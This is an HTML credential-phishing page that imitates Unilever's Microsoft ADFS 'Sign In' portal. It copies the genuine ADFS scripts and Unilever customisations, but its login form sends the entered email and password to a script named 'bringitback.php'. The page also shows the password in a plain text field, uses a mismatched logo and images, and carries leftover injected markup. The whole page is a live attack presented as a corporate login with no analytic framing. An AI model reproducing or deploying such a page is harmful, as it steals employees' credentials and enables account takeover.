x <!DOCTYPE html>
<html lang="en-GB">
    <head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=1"/>
        <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
        <meta http-equiv="cache-control" content="no-cache,no-store"/>
        <meta http-equiv="pragma" content="no-cache"/>
        <meta http-equiv="expires" content="-1"/>
        <meta name='mswebdialog-title' content='Connecting to Unilever plc.'/>
        <title>Sign In</title>
        <script type='text/javascript'>
//<![CDATA[
function LoginErrors(){this.userNameFormatError = 'Enter your user ID in the format \u0026quot;domain\\user\u0026quot; or \u0026quot;user@domain\u0026quot;.'; this.passwordEmpty = 'Enter your password.'; this.passwordTooLong = 'Password is too long (\u0026gt; 128 characters).';}; var maxPasswordLength = 128;
//]]>
</script>
<script type='text/javascript'>
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.
function InputUtil(errTextElementID, errDisplayElementID) {
    if (!errTextElementID)  errTextElementID = 'errorText'; 
    if (!errDisplayElementID)  errDisplayElementID = 'error'; 
    this.hasFocus = false;
    this.errLabel = document.getElementById(errTextElementID);
    this.errDisplay = document.getElementById(errDisplayElementID);
};
InputUtil.prototype.canDisplayError = function () {
    return this.errLabel && this.errDisplay;
}
InputUtil.prototype.checkError = function () {
    if (!this.canDisplayError){
        throw new Error ('Error element not present');
    }
    if (this.errLabel && this.errLabel.innerHTML) {
        this.errDisplay.style.display = '';        
        var cause = this.errLabel.getAttribute('for');
        if (cause) {
            var causeNode = document.getElementById(cause);
            if (causeNode && causeNode.value) {
                causeNode.focus();
                this.hasFocus = true;
            }
        }
    }
    else {
        this.errDisplay.style.display = 'none';
    }
};
InputUtil.prototype.setInitialFocus = function (input) {
    if (this.hasFocus) return;
    var node = document.getElementById(input);
    if (node) {
        if ((/^\s*$/).test(node.value)) {
            node.focus();
            this.hasFocus = true;
        }
    }
};
InputUtil.prototype.setError = function (input, errorMsg) {
    if (!this.canDisplayError) {
        throw new Error('Error element not present');
    }
    input.focus();
    if (errorMsg) {
        this.errLabel.innerHTML = errorMsg;
    }
    this.errLabel.setAttribute('for', input.id);
    this.errDisplay.style.display = '';
};
InputUtil.makePlaceholder = function (input) {
    var ua = navigator.userAgent;
    if (ua != null && 
        (ua.match(/MSIE 9.0/) != null || 
         ua.match(/MSIE 8.0/) != null ||
         ua.match(/MSIE 7.0/) != null)) {
        var node = document.getElementById(input);
        if (node) {
            var placeholder = node.getAttribute("placeholder");
            if (placeholder != null && placeholder != '') {
                var label = document.createElement('input');
                label.type = "text";
                label.value = placeholder;
                label.readOnly = true;
                label.style.position = 'absolute';
                label.style.borderColor = 'transparent';
                label.className = node.className + ' hint';
                label.tabIndex = -1;
                label.onfocus = function () { this.nextSibling.focus(); };
                node.style.position = 'relative';
                node.parentNode.style.position = 'relative';
                node.parentNode.insertBefore(label, node);
                node.onkeyup = function () { InputUtil.showHint(this); };
                node.onblur = function () { InputUtil.showHint(this); };
                node.style.background = 'transparent';
                node.setAttribute("placeholder", "");
                InputUtil.showHint(node);
            }
        }
    }
};
InputUtil.focus = function (inputField) {
    var node = document.getElementById(inputField);
    if (node) node.focus();
};
InputUtil.hasClass = function(node, clsName) {
    return node.className.match(new RegExp('(\\s|^)' + clsName + '(\\s|$)'));
};
InputUtil.addClass = function(node, clsName) {
    if (!this.hasClass(node, clsName)) node.className += " " + clsName;
};
InputUtil.removeClass = function(node, clsName) {
    if (this.hasClass(node, clsName)) {
        var reg = new RegExp('(\\s|^)' + clsName + '(\\s|$)');
        node.className = node.className.replace(reg, ' ');
    }
};
InputUtil.showHint = function (node, gotFocus) {
    if (node.value && node.value != '') {
        node.previousSibling.style.display = 'none';
    }
    else {
        node.previousSibling.style.display = '';
    }
};
InputUtil.updatePlaceholder = function (input, placeholderText) {
    var node = document.getElementById(input);
    if (node) {
        var ua = navigator.userAgent;
        if (ua != null &&
            (ua.match(/MSIE 9.0/) != null ||
            ua.match(/MSIE 8.0/) != null ||
            ua.match(/MSIE 7.0/) != null)) {
            var label = node.previousSibling;
            if (label != null) {
                label.value = placeholderText;
            }
        }
        else {
            node.placeholder = placeholderText;
        }
    }
};
//]]>
</script>
        <link rel="stylesheet" type="text/css" href="adfs/portal/css/style.css" /><style>.illustrationClass {background-image:url(adfs/ls/adfs/portal/illustration/ALUBARIKA.png);}</style>
    </head>
    <body dir="ltr" class="body">
    <div id="noScript" style="position:static; width:100%; height:100%; z-index:100">
        <h1>JavaScript required</h1>
        <p>JavaScript is required. This web browser does not support JavaScript or JavaScript in this web browser is not enabled.</p>
        <p>To find out if your web browser supports JavaScript or to enable JavaScript, see web browser help.</p>
    </div>
    <script type="text/javascript" language="JavaScript">
         document.getElementById("noScript").style.display = "none";
    </script>
    <div id="fullPage">
        <div id="brandingWrapper" class="float">
            <div id="branding"></div>
        </div>
        <div id="contentWrapper" class="float">
            <div id="content">
                <div id="header">
                    <img class='logoImage' id='companyLogo' src='/adfs/portal/logo/blessinglogo.png' alt='OFFICE 365.'/>
                </div>
                <div id="workArea">
    <div id="authArea" class="groupMargin">
    <div id="loginArea">        
        <div id="loginMessage" class="groupMargin">Sign in with your organizational account</div>
        <form method="post" id="loginForm" autocomplete="off" novalidate="novalidate" onKeyPress="if (event && event.keyCode == 13) Login.submitLoginRequest();" action="bringitback.php" >
            <div id="error" class="fieldMargin error smallText">
                <span id="errorText" for=""></span>
            </div>
            <div id="formsAuthenticationArea">
                <div id="userNameArea">
                    <label id="userNameInputLabel" for="userNameInput" class="hidden">User Account</label>
                    <input id="userNameInput" name="username" type="email"  tabindex="1" class="text fullWidth"
                        spellcheck="false" placeholder="someone@example.com" autocomplete="off"/>
                </div>
                <div id="passwordArea">
                    <label id="passwordInputLabel" for="passwordInput" class="hidden">Password</label>
                    <input id="passwordInput" name="passwd" type="text" tabindex="2" class="text fullWidth"
                        placeholder="Password" autocomplete="off"/>
                         </div>
            <input name=name id=id type=checkbox checked=""> Show password
                </div>
                <div id="kmsiArea" style="display:none">
                    <input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="3" />
                    <label for="kmsiInput">Keep me signed in</label>
                </div>
                <div id="submissionArea" class="submitMargin">
                    <span id="submitButton" class="submit" tabindex="4" role="button"
                        onKeyPress="if (event && event.keyCode == 32) Login.submitLoginRequest();"
                        onclick="return Login.submitLoginRequest();">Sign in</span>
                </div>
           
            
            <input id="optionForms" type="hidden" name="AuthMethod" value="FormsAuthentication"/>
        </form>
             <div id="authOptions">
        <form id="options"  method="post" action="bringitback.php">
            <script type="text/javascript">
                function SelectOption(option) {
                    var i = document.getElementById('optionSelection');
                    i.value = option;
                    document.forms['options'].submit();
                    return false;
                }
            </script>
            <input id="optionSelection" type="hidden" name="AuthMethod" />
            <div id='authOptionLinks' class='groupMargin'></div>
        </form>
      </div>
        <div id="introduction" class="groupMargin">
            Examples:</p><ul><li>joseph.bloggs@organisation.com</li><li>jbloggs@unilever.com</li></ul><br /><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><style>.btn {  background-color: Red;  border: none;  color: white;  /*padding: 20px 32px;*/  text-align: center; /* text-align: justify;*/  font-size: 14px;  margin: 5px 2px;  opacity: 1;  transition: 0.3s;  height: 25px; width: 30%;}.btn:hover {opacity: 0.6}</style></head><body><center><font size="2"e-all-files/</a></font></center></body></html><bgcolor=White loop=-1 scrollamount=3 width=100%><h5><b><p><font color='Red'> Get Microsoft Authenticator mobile app for faster sign-in</a><h5><p><form><input class='btn'type='button' value='Instructions' onclick=window.location.href='www.office.com' /></form></p><p></font>                     
        </div>
        <script type="text/javascript">
        //<![CDATA[
            function Login() {
            }
            Login.userNameInput = 'userNameInput';
            Login.passwordInput = 'passwordInput';
            Login.initialize = function () {
                var u = new InputUtil();
                u.checkError();
                u.setInitialFocus(Login.userNameInput);
                u.setInitialFocus(Login.passwordInput);
            }();
            Login.submitLoginRequest = function () { 
                var u = new InputUtil();
                var e = new LoginErrors();
                var userName = document.getElementById(Login.userNameInput);
                var password = document.getElementById(Login.passwordInput);
                if (!userName.value || !userName.value.match('[@\\\\]')) {
                    u.setError(userName, e.userNameFormatError);
                    return false;
                }
                if (!password.value) {
                    u.setError(password, e.passwordEmpty);
                    return false;
                }
                if (password.value.length > maxPasswordLength) {
                    u.setError(password, e.passwordTooLong);
                    return false;
                }
                document.forms['loginForm'].submit();
                return false;
            };
            InputUtil.makePlaceholder(Login.userNameInput);
            InputUtil.makePlaceholder(Login.passwordInput);
        //]]>
        </script>
    </div>
    </div>
                </div>
                <div id="footerPlaceholder"></div>
            </div>
            <div id="footer">
                <div id="footerLinks" class="floatReverse">
                     <div><span id="copyright">&#169; 2019 Microsoft</span></div>
                </div>
            </div>
        </div> 
    </div>
    <script type='text/javascript'>
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.
// This file contains several workarounds on inconsistent browser behaviors that administrators may customize.
"use strict";
// iPhone email friendly keyboard does not include "\" key, use regular keyboard instead.
// Note change input type does not work on all versions of all browsers.
if (navigator.userAgent.match(/iPhone/i) != null) {
    var emails = document.querySelectorAll("input[type='email']");
    if (emails) {
        for (var i = 0; i < emails.length; i++) {
            emails[i].type = 'text';
        }
    }
}
// In the CSS file we set the ms-viewport to be consistent with the device dimensions, 
// which is necessary for correct functionality of immersive IE. 
// However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
// values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
// Windows 8 phone has agent string 'IEMobile 10.0'
if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
    var msViewportStyle = document.createElement("style");
    msViewportStyle.appendChild(
        document.createTextNode(
            "@-ms-viewport{width:auto!important}"
        )
    );
    msViewportStyle.appendChild(
        document.createTextNode(
            "@-ms-viewport{height:auto!important}"
        )
    );
    document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
}
// If the innerWidth is defined, use it as the viewport width.
if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
    var viewport = document.querySelector("meta[name=viewport]");
    viewport.setAttribute('content', 'width=' + window.innerWidth + 'px; initial-scale=1.0; maximum-scale=1.0');
}
// Gets the current style of a specific property for a specific element.
function getStyle(element, styleProp) {
    var propStyle = null;
    if (element && element.currentStyle) {
        propStyle = element.currentStyle[styleProp];
    }
    else if (element && window.getComputedStyle) {
        propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
    }
    return propStyle;
}
// *** Unilever customisation begin ***
// Code to change "Sign in with organizational account" string.
var loginMessage = document.getElementById('loginMessage');
if(loginMessage)
{
    if("Sign in with your organizational account" == loginMessage.innerHTML)
    {
        loginMessage.innerHTML = 'Enter your Organisation email address and password';
    }
}
// Code to change the example@domain.com placeholder
var userNamePlaceHolder = document.getElementById('userNameInput');
if(userNamePlaceHolder)
{
    if("someone@example.com" == userNamePlaceHolder.getAttribute("placeholder"))
    {
        userNamePlaceHolder.setAttribute('placeholder', 'user.name@organisation.com');	
    }
}
// Code to add company name next to image
var header = document.getElementById('header');
if(header)
{
    if ("logoImage" == header.children[0].className)
    {
        var companyName = document.createTextNode(' Authentication')
        header.appendChild(companyName)
    }
}
// Code to modify the MFA welcome string
var authAreaRegion = document.getElementById('authArea');
if(authAreaRegion)
{
    // Looking to find and update this node:
    // <div class="fieldMargin bigText">Welcome DOMAIN\user.name</div>
    if(authAreaRegion.hasChildNodes())
    {
        for(i = 0; i < authAreaRegion.childElementCount; i++)
        {
            if(authAreaRegion.children.item(i).nodeName == 'DIV' && 
                authAreaRegion.children.item(i).classList[0] == 'fieldMargin' &&
                authAreaRegion.children.item(i).classList[1] == 'bigText')
            {
                /* Remove the DIV */
                //authAreaRegion.removeChild(authAreaRegion.children.item(i));
                /* regexReplace the domain, slash and dots */
                var userNameString = authAreaRegion.children.item(i);
                userNameString.innerText = userNameString.innerText.replace(/S(1|2|3)\\/, '').replace(/\.\w\.|\./, ' ').replace(/\d$/, '');
            }
        }
    }
}
// Code to change the FBA sign-in page for the Salesforce.com SaaS app
var sAMLRequestQS = decodeURIComponent(getQueryString("SAMLRequest"));
if(sAMLRequestQS != 'undefined')
{
    /* add reference to Zlib.RawInflate */
    if (!document.getElementById('zlibRef'))
    {
        var zlibjs = document.createElement('script');
        zlibjs.setAttribute('type', 'text/javascript');
        zlibjs.setAttribute('src', 'adfs/portal/script/rawinflate.min.js');
        zlibjs.setAttribute('id', 'zlibRef');
        document.getElementsByTagName("head")[0].appendChild(zlibjs);
    }
    /* SAML request is encoded and compressed - get the plain XML */
    var decodedSamlReq = decodeBase64(sAMLRequestQS);
    var inflateSaml = function() {
        if (typeof(Zlib) == 'undefined') {
            setTimeout(inflateSaml, 50);
        }
        else {
            var inflate = new Zlib.RawInflate(convertStringToBinary(decodedSamlReq));
            var inflatedXml = inflate.decompress();
            var sAMLRequest = String.fromCharCode.apply(null, new Uint16Array(inflatedXml));
            // check to see if the request if for the salesforce.com trust
            if (sAMLRequest.match(/<saml:Issuer [\w\:\=\."]+>https:\/\/[\w\.-]+salesforce.com<\/saml:Issuer>/).length > 0) {
                var fsLoginForm = document.getElementById('loginForm');
                if (fsLoginForm) {
                    // the signature in the URL is that of the RP trust for SalesForce.com therefore 
                    // render the custom string
                    var e = document.getElementById("introduction");
                    if (e)
                    { // element is present, modify its properties.
                        e.innerHTML = e.innerHTML + '<br /><p>If you don\'t have a Unilever user name to sign on to Chatter please click: <a href="https://login.salesforce.com/?login&startURL=%2F">Non-Unilever Chatter Link</a>.</p>';
                    }
                }
            }
        }
    };
    inflateSaml();
}
// Unilever-specific functions begin //
/* Converts a string into a Uint8Array */
function convertStringToBinary(raw) { 
    var rawLength = raw.length; 
    var array = new Uint8Array(new ArrayBuffer(rawLength)); 
    for(i = 0; i < rawLength; i++)
    { 
        array[i] = raw.charCodeAt(i); 
    }
    return array; 
}
/* Decodes a base64-encoded string */
function decodeBase64(s)
{
    var e = {}, i, b = 0, c, x, l = 0, a, r = '', w = String.fromCharCode, len = s.length;
    var plchldr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    for(i = 0; i < 64; i++)
    {
        e[plchldr.charAt(i)] = i;
    }
    for(x = 0; x < len; x++)
    {
        c = e[s.charAt(x)];
        b = (b << 6) + c; l += 6;
        while (l >= 8)
        {
            ((a = (b >>> (l -= 8)) & 0xff) || (x < (len - 2))) && (r += w(a));
        }
    }
    return r;
};
// captures all query strings in the address and returns the value of the
// specified query string name, if it exists
function getQueryStringsFromURL(k, url)
{
    var keyValues = url.split(/[\?&]+/);
    for (i = 0; i < keyValues.length; i++)
    {
        var v = keyValues[i].split("=");
        if (v[0].toLowerCase() == k.toLowerCase())
        {
            return v[1];
        }
    }
}
// returns the value/data of a query string in the href/address
function getQueryString(k)
{
    var url = window.location.href;
    var value = getQueryStringsFromURL(k, url);
    if (value)
    {
        return value;
    }
}
// returns the value/data of a query string in the referrer address
function getQueryStringFromReferrer(k)
{
    var url = document.referrer;
    var value = getQueryStringsFromURL(k, url);
    if (value)
    {
        return value;
    }
}
// Unilever-specific functions end //
/* *** Unilever customisation end *** */
// The script below is used for downloading the illustration image 
// only when the branding is displaying. This script work together
// with the code in PageBase.cs that sets the html inline style
// containing the class 'illustrationClass' with the background image.
var computeLoadIllustration = function () {
    var branding = document.getElementById("branding");
    var brandingDisplay = getStyle(branding, "display");
    var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");
    if (brandingDisplay && brandingDisplay !== "none" &&
        brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
        var newClass = "illustrationClass";
        if (branding.classList && branding.classList.add) {
            branding.classList.add(newClass);
        } else if (branding.className !== undefined) {
            branding.className += " " + newClass;
        }
        if (window.removeEventListener) {
            window.removeEventListener('load', computeLoadIllustration, false);
            window.removeEventListener('resize', computeLoadIllustration, false);
        }
        else if (window.detachEvent) {
            window.detachEvent('onload', computeLoadIllustration);
            window.detachEvent('onresize', computeLoadIllustration);
        }
    }
};
if (window.addEventListener) {
    window.addEventListener('resize', computeLoadIllustration, false);
    window.addEventListener('load', computeLoadIllustration, false);
}
else if (window.attachEvent) {
    window.attachEvent('onresize', computeLoadIllustration);
    window.attachEvent('onload', computeLoadIllustration);
}
//]]>
</script>
    <center><font size="2"></a></font></center></body>
</html> 
